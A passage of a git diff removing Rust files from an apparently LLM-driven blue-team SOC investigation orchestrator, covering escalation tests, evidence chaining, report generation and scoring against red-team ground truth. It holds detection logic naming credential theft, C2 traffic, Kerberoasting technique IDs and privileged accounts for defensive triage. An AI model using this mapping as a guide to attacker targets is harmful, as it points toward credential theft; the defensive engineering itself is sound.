-            "techniques_found": ["T1558.003", "T1021.002"]
-        });
-        let types = extract_evidence_types(&payload);
-        assert_eq!(types, vec!["credential_access", "lateral_movement"]);
-    }
-
-    #[test]
-    fn test_extract_evidence_types_dedup() {
-        let payload = json!({
-            "evidence_types": ["lateral_movement"],
-            "techniques_found": ["T1550.002"]
-        });
-        let types = extract_evidence_types(&payload);
-        // "lateral_movement" appears from both sources but should only be listed once
-        assert_eq!(types, vec!["lateral_movement"]);
-    }
-
-    #[test]
-    fn test_should_escalate_critical_user_in_users_investigated() {
-        let result = BlueTaskResult {
-            task_id: "t1".into(),
-            investigation_id: "inv1".into(),
-            success: true,
-            result: Some(json!({
-                "users_investigated": ["krbtgt", "normaluser"]
-            })),
-            error: None,
-            completed_at: "2026-04-08T00:00:00Z".into(),
-            worker_agent: Some("hunter1".into()),
-        };
-        let reason = should_escalate(&result);
-        assert!(reason.is_some());
-        assert!(reason.unwrap().contains("krbtgt"));
-    }
-
-    #[test]
-    fn test_should_escalate_critical_user_in_highlights() {
-        let result = BlueTaskResult {
-            task_id: "t2".into(),
-            investigation_id: "inv1".into(),
-            success: true,
-            result: Some(json!({
-                "evidence_highlights": ["Found Administrator logon from unusual host"]
-            })),
-            error: None,
-            completed_at: "2026-04-08T00:00:00Z".into(),
-            worker_agent: Some("hunter1".into()),
-        };
-        let reason = should_escalate(&result);
-        assert!(reason.is_some());
-        assert!(reason.unwrap().contains("administrator"));
-    }
-
-    #[test]
-    fn test_should_escalate_high_severity() {
-        let result = BlueTaskResult {
-            task_id: "t3".into(),
-            investigation_id: "inv1".into(),
-            success: true,
-            result: Some(json!({
-                "severity": "critical",
-                "summary": "Active data exfiltration"
-            })),
-            error: None,
-
completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("critical")); - } - - #[test] - fn test_should_escalate_schema_admins() { - let result = BlueTaskResult { - task_id: "t4".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "users_investigated": ["Schema Admins"] - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("Schema Admins")); - } - - #[test] - fn test_should_not_escalate_normal_result() { - let result = BlueTaskResult { - task_id: "t5".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "users_investigated": ["svc_backup", "jsmith"], - "severity": "low" - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - assert!(should_escalate(&result).is_none()); - } - - #[test] - fn test_should_not_escalate_failed_result() { - let result = BlueTaskResult { - task_id: "t6".into(), - investigation_id: "inv1".into(), - success: false, - result: None, - error: Some("timeout".into()), - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - assert!(should_escalate(&result).is_none()); - } - - #[test] - fn test_should_escalate_findings_mention() { - let result = BlueTaskResult { - task_id: "t7".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "findings": "Enterprise Admins group membership was modified" - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("enterprise admins")); - } - - #[test] - fn test_chain_map_coverage() { - // Verify all expected evidence types are present in the map - let expected = [ - "suspicious_ip", - "malicious_process", - "lateral_movement", - "credential_access", - "persistence_mechanism", - "c2_communication", - "privilege_escalation", - ]; - for ev_type in &expected { - assert!( - EVIDENCE_CHAIN_MAP.contains_key(ev_type), - "Missing evidence type in chain map: {ev_type}" - ); - } - } - - #[test] - fn test_privilege_escalation_dispatches_two_actions() { - let actions = EVIDENCE_CHAIN_MAP.get("privilege_escalation").unwrap(); - assert_eq!(actions.len(), 2); - let task_types: Vec<&str> = actions.iter().map(|a| a.task_type).collect(); - assert!(task_types.contains(&"lateral_analysis")); - assert!(task_types.contains(&"threat_hunt")); - } - - #[test] - fn test_critical_users_set() { - assert!(CRITICAL_USERS.contains("krbtgt")); - assert!(CRITICAL_USERS.contains("administrator")); - assert!(CRITICAL_USERS.contains("domain admins")); - assert!(CRITICAL_USERS.contains("enterprise admins")); - assert!(CRITICAL_USERS.contains("schema admins")); - assert!(!CRITICAL_USERS.contains("normaluser")); - } -} diff --git a/ares-orchestrator/src/blue/investigation.rs b/ares-orchestrator/src/blue/investigation.rs deleted file mode 100644 index 303b8f4c..00000000 --- a/ares-orchestrator/src/blue/investigation.rs +++ /dev/null @@ -1,572 +0,0 @@ -//! Investigation lifecycle management. -//! -//! Handles creating investigations, dispatching tasks to workers, -//! processing results, and driving the investigation to completion. 
-
-use std::collections::HashSet;
-use std::sync::Arc;
-
-use anyhow::{Context, Result};
-use chrono::Utc;
-use tracing::{info, warn};
-
-use ares_core::eval::workflow::evaluate_live_investigation;
-use ares_core::state::blue_task_queue::{BlueTaskQueue, BlueTaskResult};
-use ares_core::state::{BlueStateReader, BlueStateWriter, RedisStateReader};
-use ares_llm::tool_registry::blue::BlueAgentRole;
-use ares_llm::{
-    run_agent_loop, AgentLoopConfig, AgentLoopOutcome, LlmProvider, LoopEndReason, ToolDispatcher,
-};
-
-use super::callbacks::BlueCallbackHandler;
-use super::chaining;
-
-/// Represents a running investigation.
-pub struct Investigation {
-    pub investigation_id: String,
-    pub alert: serde_json::Value,
-    pub model: String,
-    /// Red team operation ID for post-investigation scoring against ground truth.
-    pub operation_id: Option<String>,
-    /// Custom report output directory. Falls back to `ARES_REPORT_DIR` env var,
-    /// then `~/.ares/reports/`.
-    pub report_dir: Option<String>,
-    pub state_writer: BlueStateWriter,
-}
-
-impl Investigation {
-    pub fn new(
-        investigation_id: String,
-        alert: serde_json::Value,
-        model: String,
-        operation_id: Option<String>,
-        report_dir: Option<String>,
-    ) -> Self {
-        let state_writer = BlueStateWriter::new(investigation_id.clone());
-        Self {
-            investigation_id,
-            alert,
-            model,
-            operation_id,
-            report_dir,
-            state_writer,
-        }
-    }
-}
-
-/// Run a complete investigation workflow driven by the orchestrator LLM.
-///
-/// The orchestrator agent coordinates triage, threat hunting, and lateral
-/// analysis by calling `dispatch_task` and processing results.
-pub async fn run_investigation(
-    investigation: &Investigation,
-    provider: Arc<dyn LlmProvider>,
-    dispatcher: Arc<dyn ToolDispatcher>,
-    _task_queue: &mut BlueTaskQueue,
-    redis_url: &str,
-    conn: &mut redis::aio::ConnectionManager,
-) -> Result<InvestigationOutcome> {
-    info!(
-        investigation_id = %investigation.investigation_id,
-        "Starting blue team investigation"
-    );
-
-    // Load investigation env vars from Redis and inject into process environment.
-    // These are set by `ares-cli blue from-operation` and include GRAFANA_URL,
-    // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries
-    // routed through Grafana's datasource proxy).
- let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id); - if let Ok(env_json) = redis::AsyncCommands::get::<_, String>(conn, &env_key).await { - if let Ok(env_map) = - serde_json::from_str::>(&env_json) - { - for (key, value) in &env_map { - // Only set if not already present — don't clobber orchestrator's own env - if std::env::var(key).is_err() { - std::env::set_var(key, value); - } - } - info!( - investigation_id = %investigation.investigation_id, - count = env_map.len(), - "Injected investigation env vars" - ); - } - } - - investigation - .state_writer - .initialize(conn, &investigation.alert) - .await - .context("Failed to initialize investigation state")?; - - // Acquire investigation lock (TTL 1 hour) - if let Ok(true) = investigation.state_writer.acquire_lock(conn, 3600).await { - info!( - investigation_id = %investigation.investigation_id, - "Acquired investigation lock" - ); - } - - investigation - .state_writer - .set_status(conn, "in_progress", None) - .await - .ok(); - - // Build the orchestrator system prompt - let role = BlueAgentRole::Orchestrator; - let tools = ares_llm::tool_registry::blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !ares_llm::tool_registry::blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let system_prompt = - ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) - .context("Failed to build blue orchestrator system prompt")?; - - // Build the task prompt with alert context using the initial alert prompt template - let task_prompt = ares_llm::prompt::blue::build_initial_alert_prompt( - &investigation.investigation_id, - &investigation.alert, - investigation.operation_id.as_deref(), - ) - .context("Failed to build initial alert prompt")?; - - let config = AgentLoopConfig { - model: investigation.model.clone(), - max_steps: 75, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Wire blue callback handler for dispatch + query + lifecycle tools - let callback_handler = Arc::new(BlueCallbackHandler::new( - Arc::clone(&provider), - Arc::clone(&dispatcher), - investigation.model.clone(), - investigation.investigation_id.clone(), - investigation.alert.clone(), - redis_url.to_string(), - )); - - // Run the orchestrator agent loop - let outcome = run_agent_loop( - provider.as_ref(), - dispatcher, - &config, - &system_prompt, - &task_prompt, - role.as_str(), - &investigation.investigation_id, - &tools, - Some(callback_handler), - ) - .await; - - let investigation_outcome = process_outcome(&outcome, &investigation.investigation_id); - - // Auto-chain follow-up tasks based on discoveries from the agent loop. 
-    let mut dispatched_chains: HashSet<String> = HashSet::new();
-    let mut chained_task_ids: Vec<String> = Vec::new();
-
-    for discovery in &outcome.discoveries {
-        let synthetic_result = BlueTaskResult {
-            task_id: format!("discovery_{}", investigation.investigation_id),
-            investigation_id: investigation.investigation_id.clone(),
-            success: true,
-            result: Some(discovery.clone()),
-            error: None,
-            completed_at: Utc::now().to_rfc3339(),
-            worker_agent: Some("orchestrator".into()),
-        };
-
-        match chaining::process_task_result(
-            &synthetic_result,
-            _task_queue,
-            &investigation.investigation_id,
-            &mut dispatched_chains,
-        )
-        .await
-        {
-            Ok(new_ids) => chained_task_ids.extend(new_ids),
-            Err(e) => {
-                warn!(
-                    investigation_id = %investigation.investigation_id,
-                    error = %e,
-                    "Failed to process evidence chain"
-                );
-            }
-        }
-    }
-
-    if !chained_task_ids.is_empty() {
-        info!(
-            investigation_id = %investigation.investigation_id,
-            count = chained_task_ids.len(),
-            "Evidence auto-chaining dispatched follow-up tasks"
-        );
-    }
-
-    // Score investigation against red team ground truth
-    if let Some(op_id) = &investigation.operation_id {
-        score_against_ground_truth(
-            conn,
-            &investigation.investigation_id,
-            op_id,
-            &investigation.model,
-            &outcome,
-        )
-        .await;
-    }
-
-    // Update investigation status
-    let final_status = match &investigation_outcome {
-        InvestigationOutcome::Completed { verdict, .. } => {
-            info!(
-                investigation_id = %investigation.investigation_id,
-                verdict = %verdict,
-                steps = outcome.steps,
-                "Investigation completed"
-            );
-            "completed"
-        }
-        InvestigationOutcome::Escalated { reason, .. } => {
-            warn!(
-                investigation_id = %investigation.investigation_id,
-                reason = %reason,
-                "Investigation escalated"
-            );
-            "escalated"
-        }
-        InvestigationOutcome::Failed { error } => {
-            warn!(
-                investigation_id = %investigation.investigation_id,
-                error = %error,
-                "Investigation failed"
-            );
-            "failed"
-        }
-    };
-
-    let error_msg = match &investigation_outcome {
-        InvestigationOutcome::Failed { error } => Some(error.as_str()),
-        _ => None,
-    };
-    investigation
-        .state_writer
-        .set_status(conn, final_status, error_msg)
-        .await
-        .ok();
-
-    // Release investigation lock
-    investigation.state_writer.release_lock(conn).await.ok();
-
-    // Auto-generate investigation report
-    generate_report(
-        conn,
-        &investigation.investigation_id,
-        investigation.report_dir.as_deref(),
-    )
-    .await;
-
-    Ok(investigation_outcome)
-}
-
-/// Resolve the report output directory.
-///
-/// Priority: explicit `report_dir` > `ARES_REPORT_DIR` env var > `~/.ares/reports/`.
-fn resolve_report_dir(report_dir: Option<&str>) -> std::path::PathBuf {
-    if let Some(dir) = report_dir {
-        return std::path::PathBuf::from(dir);
-    }
-    if let Ok(dir) = std::env::var("ARES_REPORT_DIR") {
-        return std::path::PathBuf::from(dir);
-    }
-    let home = std::env::var("HOME").unwrap_or_else(|_| ".".to_string());
-    std::path::PathBuf::from(home).join(".ares").join("reports")
-}
-
-/// Generate a markdown investigation report and write it to disk.
-///
-/// Best-effort: logs warnings on failure rather than propagating errors.
-pub(super) async fn generate_report( - conn: &mut redis::aio::ConnectionManager, - investigation_id: &str, - report_dir: Option<&str>, -) { - let reader = BlueStateReader::new(investigation_id.to_string()); - let state = match reader.load_state(conn).await { - Ok(Some(s)) => s, - Ok(None) => { - warn!( - investigation_id = investigation_id, - "Skipping report: investigation state not found" - ); - return; - } - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Skipping report: failed to load state" - ); - return; - } - }; - - let generator = match ares_core::reports::BlueTeamReportGenerator::new() { - Ok(g) => g, - Err(e) => { - warn!(error = %e, "Skipping report: failed to create report generator"); - return; - } - }; - - let report = match generator.generate_investigation(&state, &[]) { - Ok(r) => r, - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Failed to generate investigation report" - ); - return; - } - }; - - let reports_dir = resolve_report_dir(report_dir) - .join("blue") - .join("investigations"); - - if let Err(e) = std::fs::create_dir_all(&reports_dir) { - warn!( - error = %e, - "Failed to create reports directory" - ); - return; - } - - let report_path = reports_dir.join(format!("{investigation_id}.md")); - match std::fs::write(&report_path, &report) { - Ok(()) => { - info!( - investigation_id = investigation_id, - path = %report_path.display(), - "Investigation report written" - ); - } - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Failed to write investigation report" - ); - } - } -} - -/// Outcome of a completed investigation. -#[derive(Debug)] -#[allow(dead_code)] -pub enum InvestigationOutcome { - Completed { - verdict: String, - summary: String, - steps: u32, - }, - Escalated { - reason: String, - severity: String, - }, - Failed { - error: String, - }, -} - -fn process_outcome(outcome: &AgentLoopOutcome, investigation_id: &str) -> InvestigationOutcome { - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => InvestigationOutcome::Completed { - verdict: extract_verdict(result), - summary: result.clone(), - steps: outcome.steps, - }, - LoopEndReason::RequestAssistance { issue, .. } => InvestigationOutcome::Escalated { - reason: issue.clone(), - severity: if issue.to_lowercase().contains("critical") { - "critical".into() - } else { - "high".into() - }, - }, - LoopEndReason::EndTurn { content } => InvestigationOutcome::Completed { - verdict: extract_verdict(content), - summary: content.clone(), - steps: outcome.steps, - }, - LoopEndReason::MaxSteps => InvestigationOutcome::Failed { - error: format!( - "Investigation {investigation_id} hit max steps ({})", - outcome.steps - ), - }, - LoopEndReason::MaxTokens => InvestigationOutcome::Failed { - error: format!("Investigation {investigation_id} hit max tokens"), - }, - LoopEndReason::Error(err) => InvestigationOutcome::Failed { error: err.clone() }, - } -} - -/// Extract a verdict from the investigation result text. -fn extract_verdict(text: &str) -> String { - let lower = text.to_lowercase(); - if lower.contains("true positive") { - "true_positive".into() - } else if lower.contains("false positive") { - "false_positive".into() - } else if lower.contains("benign") { - "benign".into() - } else if lower.contains("malicious") || lower.contains("confirmed threat") { - "true_positive".into() - } else { - "inconclusive".into() - } -} - -/// Score a completed investigation against red team ground truth. 
-/// -/// Loads the blue team investigation state and the red team operation state -/// from Redis, then runs all six scorers to produce a grade and gap analysis. -async fn score_against_ground_truth( - conn: &mut redis::aio::ConnectionManager, - investigation_id: &str, - operation_id: &str, - model: &str, - outcome: &AgentLoopOutcome, -) { - let blue_reader = BlueStateReader::new(investigation_id.to_string()); - let blue_state = match blue_reader.load_state(conn).await { - Ok(Some(state)) => state, - Ok(None) => { - warn!( - investigation_id = investigation_id, - "Skipping evaluation: blue team state not found in Redis" - ); - return; - } - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Skipping evaluation: failed to load blue team state" - ); - return; - } - }; - - let red_reader = RedisStateReader::new(operation_id.to_string()); - let red_state = match red_reader.load_state(conn).await { - Ok(Some(state)) => state, - Ok(None) => { - warn!( - operation_id = operation_id, - "Skipping evaluation: red team state not found in Redis" - ); - return; - } - Err(e) => { - warn!( - operation_id = operation_id, - error = %e, - "Skipping evaluation: failed to load red team state" - ); - return; - } - }; - - // Estimate duration from outcome step count (rough heuristic: ~10s per step) - let duration_seconds = outcome.steps as f64 * 10.0; - - let eval_output = evaluate_live_investigation(&blue_state, &red_state, model, duration_seconds); - - info!( - investigation_id = investigation_id, - operation_id = operation_id, - grade = eval_output.result.grade(), - overall_score = format!("{:.2}", eval_output.result.overall_score), - ioc_detection = format!("{:.2}", eval_output.result.ioc_detection_rate), - technique_coverage = format!("{:.2}", eval_output.result.technique_coverage), - evidence_count = eval_output.result.evidence_count, - "Investigation evaluation complete" - ); - - if !eval_output.gap_analysis.detection_gaps.is_empty() { - info!( - investigation_id = investigation_id, - gaps = eval_output.gap_analysis.detection_gaps.len(), - "Detection gaps identified — see gap analysis for recommendations" - ); - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_extract_verdict() { - assert_eq!(extract_verdict("This is a true positive"), "true_positive"); - assert_eq!( - extract_verdict("Determined to be a false positive"), - "false_positive" - ); - assert_eq!(extract_verdict("Activity is benign"), "benign"); - assert_eq!(extract_verdict("Confirmed threat"), "true_positive"); - assert_eq!(extract_verdict("Needs more data"), "inconclusive"); - } - - #[test] - fn test_process_outcome_completed() { - let outcome = AgentLoopOutcome { - reason: LoopEndReason::TaskComplete { - task_id: "inv1".into(), - result: "True positive: lateral movement confirmed".into(), - }, - total_usage: Default::default(), - steps: 10, - tool_calls_dispatched: 5, - discoveries: Vec::new(), - tool_outputs: Vec::new(), - }; - match process_outcome(&outcome, "inv1") { - InvestigationOutcome::Completed { verdict, steps, .. 
} => {
-                assert_eq!(verdict, "true_positive");
-                assert_eq!(steps, 10);
-            }
-            other => panic!("Expected Completed, got {other:?}"),
-        }
-    }
-
-    #[test]
-    fn test_process_outcome_escalated() {
-        let outcome = AgentLoopOutcome {
-            reason: LoopEndReason::RequestAssistance {
-                issue: "Critical: active data exfiltration".into(),
-                context: "".into(),
-            },
-            total_usage: Default::default(),
-            steps: 3,
-            tool_calls_dispatched: 1,
-            discoveries: Vec::new(),
-            tool_outputs: Vec::new(),
-        };
-        match process_outcome(&outcome, "inv1") {
-            InvestigationOutcome::Escalated { severity, .. } => {
-                assert_eq!(severity, "critical");
-            }
-            other => panic!("Expected Escalated, got {other:?}"),
-        }
-    }
-}
diff --git a/ares-orchestrator/src/blue/mod.rs b/ares-orchestrator/src/blue/mod.rs
deleted file mode 100644
index 391bceb8..00000000
--- a/ares-orchestrator/src/blue/mod.rs
+++ /dev/null
@@ -1,19 +0,0 @@
-//! Blue team investigation orchestrator.
-//!
-//! Consumes investigation requests from `ares:blue:investigations`,
-//! dispatches tasks to specialized agents (triage, threat_hunter,
-//! lateral_analyst, escalation_triage) via the blue task queue,
-//! and processes results.
-//!
-//! Parallels the red team orchestrator but drives SOC investigation
-//! workflows instead of attack chains.
-
-pub mod auto_submit;
-mod callbacks;
-pub mod chaining;
-mod investigation;
-mod runner;
-mod sub_agent;
-
-pub use auto_submit::spawn_blue_auto_submit;
-pub use runner::spawn_blue_orchestrator;
diff --git a/ares-orchestrator/src/blue/runner.rs b/ares-orchestrator/src/blue/runner.rs
deleted file mode 100644
index 33181f57..00000000
--- a/ares-orchestrator/src/blue/runner.rs
+++ /dev/null
@@ -1,403 +0,0 @@
-//! Blue team orchestrator service loop.
-//!
-//! Polls `ares:blue:investigations` for new investigation requests and
-//! drives each through the investigation workflow using the LLM agent loop.
-
-use std::sync::Arc;
-use std::time::Duration;
-
-use anyhow::{Context, Result};
-use redis::AsyncCommands;
-use tokio::sync::watch;
-use tracing::{error, info, warn};
-
-use ares_core::state::blue_task_queue::BlueTaskQueue;
-use ares_llm::{LlmProvider, ToolDispatcher};
-
-use super::investigation::{self, Investigation};
-
-/// Timeout for a single investigation run (45 minutes).
-/// Loki queries via the Grafana proxy take 30-40s each from EC2,
-/// so the agent needs more headroom to complete triage + hunting.
-const INVESTIGATION_TIMEOUT_SECS: u64 = 2700;
-
-/// Threshold for considering a running investigation as stale (50 minutes).
-const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 3000;
-
-/// Interval between periodic stale investigation checks (5 minutes).
-const STALE_CHECK_INTERVAL_SECS: u64 = 300;
-
-/// Blue team investigation orchestrator.
-///
-/// Owns the LLM provider and tool dispatcher, and drives investigations
-/// from alert to completion.
-pub struct BlueOrchestrator {
-    provider: Arc<dyn LlmProvider>,
-    model_name: String,
-    dispatcher: Arc<dyn ToolDispatcher>,
-    redis_url: String,
-}
-
-impl BlueOrchestrator {
-    pub fn new(
-        provider: Box<dyn LlmProvider>,
-        model_name: String,
-        dispatcher: Arc<dyn ToolDispatcher>,
-        redis_url: String,
-    ) -> Self {
-        Self {
-            provider: Arc::from(provider),
-            model_name,
-            dispatcher,
-            redis_url,
-        }
-    }
-
-    /// Clean up stale investigations left in "running" status.
-    ///
-    /// Scans `ares:blue:active_investigations` for investigation IDs whose
-    /// status has been `in_progress` for longer than the threshold. Marks
-    /// them as `failed` with an orphaned message and removes them from the active set.
-    async fn cleanup_stale_investigations(&self) {
-        let conn = match redis::Client::open(self.redis_url.as_str()) {
-            Ok(client) => match client.get_connection_manager().await {
-                Ok(c) => c,
-                Err(e) => {
-                    warn!("Stale cleanup: failed to connect to Redis: {e}");
-                    return;
-                }
-            },
-            Err(e) => {
-                warn!("Stale cleanup: failed to open Redis client: {e}");
-                return;
-            }
-        };
-        let mut conn = conn;
-
-        // Get all active investigation IDs
-        let active_ids: Vec<String> = match conn
-            .smembers::<_, Vec<String>>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS)
-            .await
-        {
-            Ok(ids) => ids,
-            Err(e) => {
-                warn!("Stale cleanup: failed to read active investigations: {e}");
-                return;
-            }
-        };
-
-        if active_ids.is_empty() {
-            return;
-        }
-
-        let now = chrono::Utc::now();
-        let mut cleaned = 0u32;
-
-        for inv_id in &active_ids {
-            let status_key = format!("ares:blue:inv:{inv_id}:status");
-            let status_json: Option<String> = conn.get(&status_key).await.unwrap_or(None);
-
-            let status_obj = match status_json
-                .as_deref()
-                .and_then(|s| serde_json::from_str::<serde_json::Value>(s).ok())
-            {
-                Some(v) => v,
-                None => continue,
-            };
-
-            let status = status_obj
-                .get("status")
-                .and_then(|v| v.as_str())
-                .unwrap_or("");
-            if status != "in_progress" {
-                continue;
-            }
-
-            let started_at = status_obj
-                .get("started_at")
-                .and_then(|v| v.as_str())
-                .and_then(|s| chrono::DateTime::parse_from_rfc3339(s).ok())
-                .map(|dt| dt.with_timezone(&chrono::Utc));
-
-            let elapsed_secs = match started_at {
-                Some(dt) => (now - dt).num_seconds(),
-                None => STALE_INVESTIGATION_THRESHOLD_SECS + 1, // no timestamp = assume stale
-            };
-
-            if elapsed_secs > STALE_INVESTIGATION_THRESHOLD_SECS {
-                let hours = elapsed_secs as f64 / 3600.0;
-                let error_msg = format!(
-                    "Investigation orphaned after orchestrator restart (was running {hours:.1}h)"
-                );
-
-                // Update status to failed
-                let updated = serde_json::json!({
-                    "status": "failed",
-                    "started_at": status_obj.get("started_at").unwrap_or(&serde_json::Value::Null),
-                    "failed_at": now.to_rfc3339(),
-                    "error": error_msg,
-                });
-                let data = serde_json::to_string(&updated).unwrap_or_default();
-                let _: Result<(), _> = conn.set_ex::<_, _, ()>(&status_key, &data, 86400).await;
-
-                // Remove from active set
-                let _: Result<(), _> = conn
-                    .srem::<_, _, ()>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, inv_id)
-                    .await;
-
-                warn!(
-                    investigation_id = %inv_id,
-                    elapsed_hours = format!("{hours:.1}"),
-                    "Marked stale investigation as failed"
-                );
-                cleaned += 1;
-            }
-        }
-
-        if cleaned > 0 {
-            info!(count = cleaned, "Stale investigation cleanup complete");
-        }
-    }
-
-    /// Run the blue team orchestration loop until shutdown.
-    ///
-    /// Polls `ares:blue:investigations` for new investigation requests.
-    /// Each request contains an alert payload and the LLM model to use.
-    pub async fn run(&self, mut shutdown_rx: watch::Receiver<bool>) -> Result<()> {
-        info!("Blue team orchestrator starting");
-
-        // Clean up stale investigations from previous runs
-        self.cleanup_stale_investigations().await;
-
-        let mut task_queue = BlueTaskQueue::connect(&self.redis_url)
-            .await
-            .context("Failed to connect blue task queue to Redis")?;
-
-        let mut retry_delay = Duration::from_secs(1);
-        let max_retry_delay = Duration::from_secs(30);
-        let mut last_stale_check = std::time::Instant::now();
-
-        loop {
-            // Check shutdown
-            if *shutdown_rx.borrow() {
-                info!("Blue orchestrator: shutdown signalled");
-                break;
-            }
-
-            // Poll for investigation requests
-            let poll_result = tokio::select!
{ - result = task_queue.pop_investigation_request(5.0) => result, - _ = shutdown_rx.changed() => { - info!("Blue orchestrator: shutdown during poll"); - break; - } - }; - - match poll_result { - Ok(Some(request)) => { - retry_delay = Duration::from_secs(1); - - let investigation_id = request - .get("investigation_id") - .and_then(|v| v.as_str()) - .map(String::from) - .unwrap_or_else(|| uuid::Uuid::new_v4().to_string()); - - let alert = request - .get("alert") - .cloned() - .unwrap_or(serde_json::json!({})); - - let raw_model = request - .get("model") - .and_then(|v| v.as_str()) - .filter(|s| !s.is_empty()) - .unwrap_or(&self.model_name); - // Strip provider prefix (e.g. "openai/gpt-5.2" → "gpt-5.2") - let model = raw_model - .split_once('/') - .map(|(_, name)| name) - .unwrap_or(raw_model) - .to_string(); - - let operation_id = request - .get("operation_id") - .and_then(|v| v.as_str()) - .map(String::from); - - // Report directory: request > ARES_REPORT_DIR env > ~/.ares/reports/ - let report_dir = request - .get("report_dir") - .and_then(|v| v.as_str()) - .map(String::from) - .or_else(|| std::env::var("ARES_REPORT_DIR").ok()); - - info!( - investigation_id = %investigation_id, - model = %model, - operation_id = ?operation_id, - "Received investigation request" - ); - - // Register the investigation - if let Err(e) = task_queue - .register_investigation(&investigation_id, &alert, &model) - .await - { - warn!(err = %e, "Failed to register investigation"); - } - - // Run the investigation - let investigation = Investigation::new( - investigation_id.clone(), - alert, - model, - operation_id, - report_dir, - ); - - let mut conn = redis::Client::open(self.redis_url.as_str())? - .get_connection_manager() - .await?; - - match tokio::time::timeout( - Duration::from_secs(INVESTIGATION_TIMEOUT_SECS), - investigation::run_investigation( - &investigation, - Arc::clone(&self.provider), - Arc::clone(&self.dispatcher), - &mut task_queue, - &self.redis_url, - &mut conn, - ), - ) - .await - { - Ok(Ok(outcome)) => { - info!( - investigation_id = %investigation_id, - outcome = ?outcome, - "Investigation finished" - ); - } - Ok(Err(e)) => { - error!( - investigation_id = %investigation_id, - err = %e, - "Investigation failed with error" - ); - } - Err(_elapsed) => { - error!( - investigation_id = %investigation_id, - timeout_secs = INVESTIGATION_TIMEOUT_SECS, - "Investigation timed out — cancelling" - ); - - // Write timed_out status so downstream consumers know - // what happened (the future was dropped before it could - // write its own final status). - investigation - .state_writer - .set_status( - &mut conn, - "timed_out", - Some("Investigation exceeded timeout"), - ) - .await - .ok(); - - // Release the lock that was acquired inside the - // now-cancelled future. - investigation - .state_writer - .release_lock(&mut conn) - .await - .ok(); - - // Generate a partial report from whatever evidence was - // collected before the timeout. 
-                            investigation::generate_report(
-                                &mut conn,
-                                &investigation.investigation_id,
-                                investigation.report_dir.as_deref(),
-                            )
-                            .await;
-                        }
-                    }
-
-                    // Clean up active investigation registration
-                    let _: Result<(), _> = conn
-                        .srem::<_, _, ()>(
-                            ares_core::state::BLUE_ACTIVE_INVESTIGATIONS,
-                            &investigation_id,
-                        )
-                        .await;
-                }
-                Ok(None) => {
-                    retry_delay = Duration::from_secs(1);
-                    // Periodic stale investigation cleanup
-                    if last_stale_check.elapsed() >= Duration::from_secs(STALE_CHECK_INTERVAL_SECS)
-                    {
-                        self.cleanup_stale_investigations().await;
-                        last_stale_check = std::time::Instant::now();
-                    }
-                }
-                Err(e) => {
-                    let error_str = e.to_string().to_lowercase();
-                    let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"]
-                        .iter()
-                        .any(|kw| error_str.contains(kw));
-
-                    if is_conn_error {
-                        warn!(
-                            delay_secs = retry_delay.as_secs(),
-                            "Blue orchestrator: connection error, will reconnect: {e}"
-                        );
-                        tokio::select! {
-                            _ = tokio::time::sleep(retry_delay) => {}
-                            _ = shutdown_rx.changed() => break,
-                        }
-                        retry_delay = (retry_delay * 2).min(max_retry_delay);
-
-                        // Reconnect the task queue — the previous ConnectionManager
-                        // can be stuck after Redis restarts or prolonged outages.
-                        match BlueTaskQueue::connect(&self.redis_url).await {
-                            Ok(new_queue) => {
-                                task_queue = new_queue;
-                                info!("Blue orchestrator: reconnected to Redis");
-                            }
-                            Err(reconnect_err) => {
-                                warn!("Blue orchestrator: reconnect failed: {reconnect_err}");
-                            }
-                        }
-                    } else {
-                        error!("Blue orchestrator: non-connection error: {e}");
-                        tokio::time::sleep(Duration::from_secs(5)).await;
-                    }
-                }
-            }
-        }
-
-        info!("Blue team orchestrator stopped");
-        Ok(())
-    }
-}
-
-/// Spawn the blue team orchestrator as a background tokio task.
-///
-/// Returns a `JoinHandle` that resolves when the orchestrator stops.
-pub fn spawn_blue_orchestrator(
-    provider: Box<dyn LlmProvider>,
-    model_name: String,
-    dispatcher: Arc<dyn ToolDispatcher>,
-    redis_url: String,
-    shutdown_rx: watch::Receiver<bool>,
-) -> tokio::task::JoinHandle<()> {
-    tokio::spawn(async move {
-        let orchestrator = BlueOrchestrator::new(provider, model_name, dispatcher, redis_url);
-        if let Err(e) = orchestrator.run(shutdown_rx).await {
-            error!("Blue orchestrator exited with error: {e}");
-        }
-    })
-}
diff --git a/ares-orchestrator/src/blue/sub_agent.rs b/ares-orchestrator/src/blue/sub_agent.rs
deleted file mode 100644
index 04b8f5cf..00000000
--- a/ares-orchestrator/src/blue/sub_agent.rs
+++ /dev/null
@@ -1,142 +0,0 @@
-//! Infrastructure wrapper types for blue team sub-agent dispatch.
-//!
